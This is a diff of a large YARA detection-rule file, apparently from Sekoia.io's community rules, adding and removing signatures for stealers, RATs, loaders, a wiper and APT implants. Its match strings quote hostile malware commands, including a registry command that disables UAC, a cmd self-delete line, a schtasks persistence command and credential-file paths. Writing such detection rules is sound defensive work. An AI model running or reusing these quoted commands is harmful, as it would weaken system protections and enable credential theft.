-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 3MB and ( all of them or hash.md5 ( pe.rich_signature.clear_data ) == "950c0710dc4cbf6e2cd6b857d25da523" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "547e43dd8560fa8b0ca0be9f633bf62d" ) )
+		uint16be( 0 ) == 0x4d5a and filesize < 5MB and 4 of them
 }
-rule SEKOIA_Backdoor_Win_Rollsling : FILE
+rule SEKOIA_Hacktool_Win_Powertool : FILE
 {
 	meta:
-		description = "Detect Lazarus' RollSling malware (aka LazarLoader)"
+		description = "Detect PowerTool based on strings"
 		author = "Sekoia.io"
-		id = "5ef23b9c-5bc5-4f02-b1b4-1af18a03241a"
-		date = "2023-10-24"
+		id = "ab8355b8-322d-41a4-82f0-43896c96b9bc"
+		date = "2022-09-09"
 		modified = "2024-12-19"
-		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_rollsling.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_powertool.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5cee25638bdc86b3ffb1c616943d647ca170c5c0140ae3e3118f56b504fa862f"
+		logic_hash = "aeccba821e528ca03abc8b50362d450ba2c12ab443454faf5b2809aecd163648"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca"
-		hash2 = "48538a935ddf2cbeb4918d0ccf9372ec8e0a57c5fd145a584a9b1bb4ebbcd5ce"
-		hash3 = "18825be6b269087d7699f3d0aa2e6db2ae72ded36c56aa8e7b8a606dde3741fa"
-		hash4 = "645205e38dfdd560f6242ba717af1bfdd8e85baf5e710d724b853fe9808c4551"
-		hash5 = "455bab490a300d9d63b8777c223287c0a6a647ca7b98b96fd3236f83b8adc77b"
 
 	strings:
-		$s1 = "LookupPrivilegeVCreateRemoteThreAdjustTokenPriviOpenProcessToken"
+		$str0 = "C:\\dev\\pt64_en\\Release\\PowerTool.pdb" ascii
+		$str1 = "Chage language nedd to restart PowerTool" ascii
+		$str2 = "(http://twitter.com/ithurricanept && https://www.linkedin.com/in/powertool)" wide
+		$str3 = "Infected=Before Fix, whether to back up the drive files will be fixed?" wide
+		$str4 = "Infected?-Are you sure to Fix the Infected Driver File?" wide
+		$str5 = "shellex\\ContextMenuHandlers\\PowerTool" wide
+		$str6 = "[PowerTool] name=%s, size=%d, %d" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SEKOIA_Win_Infostealer_Serpent_Strings : FILE
+rule SEKOIA_Infostealer_Win_Vidar_Strings_Nov23 : FILE
 {
 	meta:
-		description = "Serpent Stealer string"
+		description = "Finds Vidar samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "ad9e2366-c95e-4090-a0db-48f3cc325209"
-		date = "2023-12-04"
+		id = "b2c17627-f9b8-4401-b657-1cce560edc76"
+		date = "2023-11-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_infostealer_serpent_strings.yar#L1-L23"
+		reference = "https://twitter.com/crep1x/status/1722652451319202242"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_vidar_strings_nov23.yar#L1-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5266d1c8228f02e8ac9da5ddd8b968fde0d0e83afa408d405ec4ca50c3453928"
+		logic_hash = "1a2fc421fb4058b78de28d97d69b126e685f7677b7998f5b6ae3cbcee0ef3f00"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248058,88 +248153,99 @@ rule SEKOIA_Win_Infostealer_Serpent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "User Has SSH Dir." wide
-		$s2 = "[+] Executing Wallets" wide
-		$s3 = "'serpent' folder" wide
-		$s4 = "Buddy Kys!!!" wide
-		$s5 = "http://checkip.dyndns.org/" wide
-		$s6 = "[+] Target has discord installed" wide
-		$s7 = "Target has minecraft." wide
+		$str01 = "MachineID:" ascii
+		$str02 = "Work Dir: In memory" ascii
+		$str03 = "[Hardware]" ascii
+		$str04 = "VideoCard:" ascii
+		$str05 = "[Processes]" ascii
+		$str06 = "[Software]" ascii
+		$str07 = "information.txt" ascii
+		$str08 = "%s\\*" ascii
+		$str09 = "Select * From AntiVirusProduct" ascii
+		$str10 = "SELECT target_path, tab_url from downloads" ascii
+		$str11 = "Software\\Martin Prikryl\\WinSCP 2\\Configuration" ascii
+		$str12 = "UseMasterPassword" ascii
+		$str13 = "Soft: WinSCP" ascii
+		$str14 = "<Pass encoding=\"base64\">" ascii
+		$str15 = "Soft: FileZilla" ascii
+		$str16 = "passwords.txt" ascii
+		$str17 = "build_id" ascii
+		$str18 = "file_data" ascii
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize < 100KB and 5 of them
+		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
 }
-rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_2 : FILE
+rule SEKOIA_Apt_Apt28_Htmlsmuggling
 {
 	meta:
-		description = "Matches the Gamaredon Stealer obfuscation"
+		description = "Detects some kind of HTMLSmuggling used by APT28"
 		author = "Sekoia.io"
-		id = "fd278a90-537b-4c67-9421-01c9f2416b60"
-		date = "2022-02-04"
+		id = "2e20c992-d971-4c0f-99b3-a7d528c7055a"
+		date = "2023-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_stealer_obfuscation_2.yar#L1-L17"
+		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_htmlsmuggling.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6ffd8504ba8ca614d3941bd46b944d85e0ad4b9d8d2960d508f50550497d2852"
+		logic_hash = "47cca1d0a0843c8df43661ee8188dae86cce06e1f3982973871863728d328e89"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 3d 20 6e 65 77 20 73 74 72 69 6e 67 5b 5d 20 7b 20 [50-200] 20 7d 3b }
+		$s1 = "click();" ascii
+		$s2 = "window.location.replace("
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100MB and #s1 > 40
+		$s1 in ( @s2 .. @s2-100 )
 }
-rule SEKOIA_Infostealer_Win_Bebra : FILE
+rule SEKOIA_Rat_Win_Remcos : FILE
 {
 	meta:
-		description = "Find samples of Bebra Stealer based on specific strings"
+		description = "DEPRECATED : Find Remcos RAT samples based on specific strings"
 		author = "Sekoia.io"
-		id = "e84d04a7-1232-47e5-b797-ac8e56066796"
-		date = "2023-02-06"
+		id = "011132f5-c5d9-4e97-bfed-0b94c9a30481"
+		date = "2023-01-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_bebra.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_remcos.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "7841746c54c53dbcafdf3f357c7a84b90fe3b089e07f30dea15ef6f7f15b0f00"
-		logic_hash = "588fa3091f0dc565123c60d59479202d036e092499eca6204d420395ddc332f9"
+		logic_hash = "259f31d745449dc81cde698bb0ae4a20b4bbf050a1c818fbb5a891f26ca2e856"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-01-08"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=" ascii
-		$str02 = "https://www.youtube.com/getAccountSwitcher" ascii
-		$str03 = "\"challenge\":\"" ascii
-		$str04 = "\"botguardResponse\":\"" ascii
-		$str05 = "\"continueUrl\":\"https://studio.youtube.com/reauth\"," ascii
-		$str06 = "\"flow\":\"REAUTH_FLOW_YT_STUDIO_COLD_LOAD\"," ascii
-		$str07 = "\"xguardClientStatus\":0" ascii
-		$str08 = "SAPISIDHASH" ascii
-		$str09 = "system32\\cmd.exe /C choice /C Y /N /D Y /T 0 &Del" ascii
-		$str10 = "/new.php" ascii
-		$str11 = "github.com/mattn/go-sqlite3" ascii
+		$str01 = "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" ascii
+		$str02 = "Disconnection occurred, retrying to connect..." ascii
+		$str03 = "[Following text has been pasted from clipboard:]" ascii
+		$str04 = "[Following text has been copied to clipboard:]" ascii
+		$str05 = "[Chrome StoredLogins found, cleared!]" ascii
+		$str06 = "PING 127.0.0.1 -n 2" ascii
+		$str07 = "Remcos_Mutex_Inj" ascii
+		$str08 = " * REMCOS v" ascii
+		$str09 = "Connected to C&C!" ascii
+		$str10 = "[Cleared all cookies & stored logins!]" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 9 of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule SEKOIA_Dropper_Win_Selfau3
+rule SEKOIA_Apt_Kimsuky_Sharpext_Compromised_Securepreferences
 {
 	meta:
-		description = "Finds SelfAU3 Dropper samples based on specific strings"
+		description = "Detects compromised Chrome SecurePreferences file"
 		author = "Sekoia.io"
-		id = "2d005a54-b013-40e9-b88a-30454e4b22af"
-		date = "2024-02-12"
+		id = "aeda5d15-82e1-4ffc-8252-1eb4fc78d024"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_win_selfau3.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_sharpext_compromised_securepreferences.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5f69457127ae6cb84b04f72dd30393dbcf32b4ba26ec6d529eebcc03191cbed3"
+		logic_hash = "662358fdb4c4cfa9984d06e391ade52e1c7a3d7b78724aea4fb0d6035fe2e7b2"
 		score = 75
 		quality = 80
 		tags = ""
@@ -248147,252 +248253,204 @@ rule SEKOIA_Dropper_Win_Selfau3
 		classification = "TLP:CLEAR"
 
 	strings:
-		$sfx = "!Require Windows" ascii
-		$ins01 = ";!@Install@!UTF-8!" ascii
-		$set = {53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 3d 22 [1-15] 3d ?? 22}
-		$run = "RunProgram=\"hidcon:c" ascii
-		$ins02 = ";!@InstallEnd@!" ascii
+		$ = "\"devtools\", \"tabs\", \"webNavigation\", \"webRequest\", \"webRequestBlocking\""
+		$ = "AppData\\\\Roaming"
+		$ = "https://*/*"
 
 	condition:
-		$sfx at 77 and $set in ( @ins01 .. @ins01 + 500 ) and #set > 5 and $run in ( @set .. @set + 1000 ) and $ins02 in ( @run .. @run + 500 )
+		all of them
 }
-rule SEKOIA_Tool_Ehole : FILE
+
+rule SEKOIA_Downloader_Win_Apt33_Tickler : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detect the downloader used by APT33 to diwnload Tickler"
 		author = "Sekoia.io"
-		id = "7d30ffd0-fada-4ef4-98c3-5572a4e1e140"
-		date = "2023-06-23"
+		id = "e1f704d6-d527-479a-8311-d286c06768ac"
+		date = "2024-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_ehole.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_apt33_tickler.yar#L4-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "df937417b2f8e12f80fbe2edaa0863de6ed7862c117dff2a21255cb7d1d9ad3d"
+		logic_hash = "e6fff291b73812e5a999fbc566e8f7181dcdf01b849a9664ba05fe0a2bc982fe"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = "main.http400"
-		$s2 = "main.fofa_c"
-		$s3 = "main.Jsjump"
-		$s4 = "main.StandBase64"
-		$s5 = "main.fofa_http"
-		$s6 = "main.fofa_seach"
-
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 11MB and all of them
+		uint16be( 0 ) == 0x4d5a and pe.imphash ( ) == "e43c58659b5b3082387307603478881a" or hash.md5 ( pe.rich_signature.clear_data ) == "d30bd7875b225709ecf95bf68dbd435f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d7d2079d0a656c06a03f2c277bb08bda" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "61a1425e6a0d28e29c6fd3d451ac3717" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "916bf96ed3274ce8322d9f370432844f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3fab9d4ae989d53cecb2f443b8ce88d0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e0967483e074da72ceff4dea3bc17530" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "b4a571736b6646765155ffbd57c27c83" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "35c88ba521887f8fe1b2501f8cd8bd98" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "636dc666c7496cb3382b029fed53473f181cdc24405886c468e51a103d78b4d4" )
 }
-rule SEKOIA_Apt_Reaper_Malicious_Lnk : FILE
+
+rule SEKOIA_Apt_Win_Disabledefender
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "detects strings and imphash"
 		author = "Sekoia.io"
-		id = "8f055d1b-5727-4d77-9671-cdbb1ea69d5f"
-		date = "2023-09-12"
+		id = "a7b124ab-4c9d-47c0-a59e-211cc713b9b3"
+		date = "2022-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_reaper_malicious_lnk.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_win_disabledefender.yar#L3-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8cec5819dd7b01b3993acae056f5640fa28ffe76b05d2d9e59779a73eb00bd6e"
+		logic_hash = "3b8c8d9144d9f97ee053c7cefc30d3920940bc33efcd1d7f5c61666217ef7896"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "*rshell.exe" wide
-		$ = "/od') do call" wide
+		$ = "Restarting with privileges"
+		$ = "Windows defender is currently ACTIVE"
+		$ = "Windows defender is currently OFF"
+		$ = "Disabled windows defender"
+		$ = "Failed to disable defender..."
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them
+		4 of them or pe.imphash ( ) == "74a6ef9e7b49c71341e439022f643c8e"
 }
-rule SEKOIA_Apt_Uta0178_Javascript_Inclusion_Strings
+rule SEKOIA_Downloader_Win_Cobianrat : FILE
 {
 	meta:
-		description = "Detects UTA0178 malicious inclusion strings"
+		description = "Detect CobianRAT downloader"
 		author = "Sekoia.io"
-		id = "af816c35-1f00-47ea-86ee-c034607c625e"
-		date = "2024-01-12"
+		id = "7a86c17f-bf4e-4465-9488-244b75fc36f1"
+		date = "2024-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_uta0178_javascript_inclusion_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_cobianrat.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d3fedf49417178df374d6ae20e57ffcfa00cb68a647769964c049d9a8e0f4958"
+		hash = "7a70779d9d7de5e370fac0fa2d4ccd13"
+		hash = "2ce40599a4990680db3af5defcd5381a"
+		hash = "56515c48f82475e7bb6a26b027a459d7"
+		hash = "3450bece12bd8103d5e718a2661d0404"
+		hash = "132858739129d2b863dc547facbed7e9"
+		hash = "693bd96d162c54d7e9605580eaf54a6e"
+		hash = "d03a4988e22e6c7b2a03efa2bdb1502d"
+		hash = "ab8c68b907ec2ce316bf18f00938710c"
+		logic_hash = "6437a2d0854fb7bd9ddde8434e9a2b95cbb7ccc04381400db211f38a6a575e43"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s0 = ".value"
-		$s1 = "btoa("
-		$s2 = "https://"
-		$s3 = "new XMLHttpRequest();"
-		$s4 = ".send(null);"
+		$ = {24 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 55 00 72 00 6C 00 20 00 3D 00 20 00 27}
 
 	condition:
-		@s0< @s1 and @s1 < @s2 and @s2 < @s3 and @s3 < @s4 and @s4- @s0 < 350
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Sandworm_Caddywiper_Stacked_Strings : FILE
+
+rule SEKOIA_Apt_Mustang_Panda_Toneins : FILE
 {
 	meta:
-		description = "Detects stacked strings used in the wiper."
+		description = "Detect the TONEINS implant used by Mustang Panda"
 		author = "Sekoia.io"
-		id = "7750c4b6-5781-4b1c-8200-cbce9f18aa56"
-		date = "2022-04-06"
+		id = "f178217a-ff28-4dd7-9395-f19f3e2e934c"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_caddywiper_stacked_strings.yar#L1-L74"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustang_panda_toneins.yar#L4-L44"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e8c94e8611a50080368785d2b341a95d5359d1d814e1d665553324118700ed10"
+		logic_hash = "b71932f16ffb1d8d1780b6f9b4db2f0c98d1c770829a4d2284e78c19d37e54bb"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "2.0"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { C6 45 ?? 6E
-        C6 45 ?? 65
-        C6 45 ?? 74
-        C6 45 ?? 61
-        C6 45 ?? 70
-        C6 45 ?? 69
-        C6 45 ?? 33
-        C6 45 ?? 32
-        C6 45 ?? 2E
-        C6 45 ?? 64
-        C6 45 ?? 6C
-        C6 45 ?? 6C }
-		$ = {  C6 45 ?? 44
-        C6 45 ?? 65
-        C6 45 ?? 76
-        C6 45 ?? 69
-        C6 45 ?? 63
-        C6 45 ?? 65
-        C6 45 ?? 49
-        C6 45 ?? 6F
-        C6 45 ?? 43
-        C6 45 ?? 6F
-        C6 45 ?? 6E
-        C6 45 ?? 74
-        C6 45 ?? 72
-        C6 45 ?? 6F
-        C6 45 ?? 6C }
-		$ = { C6 45 ?? 5C
-        C6 45 ?? 00
-        C6 45 ?? 5C
-        C6 45 ?? 00
-        C6 45 ?? 2E
-        C6 45 ?? 00
-        C6 45 ?? 5C
-        C6 45 ?? 00
-        C6 45 ?? 50
-        C6 45 ?? 00
-        C6 45 ?? 48
-        C6 45 ?? 00
-        C6 45 ?? 59
-        C6 45 ?? 00
-        C6 45 ?? 53
-        C6 45 ?? 00
-        C6 45 ?? 49
-        C6 45 ?? 00
-        C6 45 ?? 43
-        C6 45 ?? 00
-        C6 45 ?? 41
-        C6 45 ?? 00
-        C6 45 ?? 4C
-        C6 45 ?? 00
-        C6 45 ?? 44
-        C6 45 ?? 00
-        C6 45 ?? 52
-        C6 45 ?? 00
-        C6 45 ?? 49
-        C6 45 ?? 00
-        C6 45 ?? 56
-        C6 45 ?? 00
-        C6 45 ?? 45 }
+		$rtti1 = ".?AVDNameNode@@"
+		$rtti2 = ".?AVcharNode@@"
+		$rtti3 = ".?AVpcharNode@@"
+		$rtti4 = ".?AVpDNameNode@@"
+		$rtti5 = ".?AVDNameStatusNode@@"
+		$rtti6 = ".?AVpairNode@@"
+		$s1 = "DefWindowProcW1222_test" wide ascii
+		$s2 = "schtasks /create /sc minute /mo 2 /tn" wide ascii
+		$fnv_CreateFile = {CE C9 CA BD}
+		$fnv_GetFileSize = {18 81 ED 44}
+		$fnv_ReadFile = {43 C9 FC 54}
+		$fnv_CloseHandle = {65 00 BA FA}
+		$fnv_WriteFile = {4A C4 07 7F}
+		$fnv_CreateEventA = {E2 DD D2 F9}
+		$fnv_TerminateProcess = {59 EE 4E F8}
+		$fnv_GetCurrentProcess = {45 A8 D8 6D}
+		$fnv_CreateProcessA = { 09 0A 7C 4A}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of them
+		uint16be( 0 ) == 0x4d5a and 4 of ( $rtti* ) and filesize < 8MB and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "69f400d3ff4679294e63fb8a8ca97dbb" ) or ( all of ( $s* ) and 5 of ( $fnv* ) ) )
 }
-rule SEKOIA_Apt_Polonium_Technocreep_Strings : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_3 : FILE
 {
 	meta:
-		description = "Tries to detect TechnoCreep implant"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "dad79df3-b081-458e-9c14-1d5e2b43ba91"
-		date = "2022-10-12"
+		id = "57b3ca9a-59c5-4b28-8eb9-36ff5b3633c2"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_technocreep_strings.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_3.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6fbd14d39f215b835c0fe7709041ca982774be42d389397d19a41fda6f7a00d1"
+		logic_hash = "ef62075c804080c0450f856b768da84a32f20e2f1ce5714e477b3e6f01d60503"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "file name : " ascii wide
-		$ = "copy to : " ascii wide
-		$ = "download" ascii wide
-		$ = "persistence" ascii wide
-		$ = "/cmdResult created!" ascii wide
-		$ = "/downloadsResulat created!" ascii wide
-		$ = "Downloading will take minets..." ascii wide
-		$ = "powershell -Command \"$c1 = " ascii wide
-		$ = "Missing Parameter.. Format of command:" ascii wide
-		$ = "File Fath On Target Device Not Exists>" ascii wide
-		$ = "/MissingDownloadParameter.txt" ascii wide
+		$ = "Function RC4(byteMessage, strKey)"
+		$ = "Sub Run()"
+		$ = "plain = RC4(decoded, "
+		$ = "Dim plain"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Badmagic_Startrevsocks_Pshscript : FILE
+
+rule SEKOIA_Installer_Win_Minibus : FILE
 {
 	meta:
-		description = "Detects BadMagic DLL Loader powershell script"
+		description = "Detect MINIBUS installer"
 		author = "Sekoia.io"
-		id = "a6c96aee-9e78-47d2-afe3-f3c5246a9370"
-		date = "2023-05-15"
+		id = "0f7f600d-d93b-4b5a-aa0e-7d91038409e6"
+		date = "2024-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_startrevsocks_pshscript.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/installer_win_minibus.yar#L4-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6a4615afb836330634cde9559dacfff50daef44a370f6191c6771a2066074a31"
+		logic_hash = "24326c9f5dcb7e66d47b65bf6bec6fe78be18c8d41a3039fbd09b453568a3f8f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "26ca51cb067e1fdf1b8ad54ba49883bc5d1945952239aec0c4840754bff76621"
+		hash2 = "90fa29cc98be1d715df26d22079bdb8ce1d1fd3ce6a4efb39a4c192134e01020"
 
 	strings:
-		$ = "$ExecutablePath"
-		$ = "Start-Sleep -Second 2"
-		$ = "recn -15 -rect 15"
+		$ = "\\essential.dat"
+		$ = "TorvaldInitial.dll"
 
 	condition:
-		all of them and filesize < 1KB
+		uint16be( 0 ) == 0x4d5a and 1 of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" )
 }
-rule SEKOIA_Apt_Kimsuky_Malicious_Gotopwsh_Lnk : FILE
+rule SEKOIA_Loader_Win_Jinxloader_Strings : FILE
 {
 	meta:
-		description = "Detects malicious LNK used by Kimsuky"
+		description = "Finds JinxLoader samples based on the specific strings"
 		author = "Sekoia.io"
-		id = "cfe9adf5-2c06-4d04-8006-c4eea0dab549"
-		date = "2023-09-11"
+		id = "fd2f7e8c-f4a8-4452-bbc6-e03790f8ed89"
+		date = "2023-12-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_malicious_gotopwsh_lnk.yar#L1-L15"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_jinxloader_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "1537ea232e745b1ed9e4b7f6b9ba779a3498f5edf0c46bdccfdc511137b2bb3a"
+		logic_hash = "816cb6019cba1aa2e229ab476fcdf378348981920cbe17d3dfb875f8b2dcbf81"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248400,47 +248458,50 @@ rule SEKOIA_Apt_Kimsuky_Malicious_Gotopwsh_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
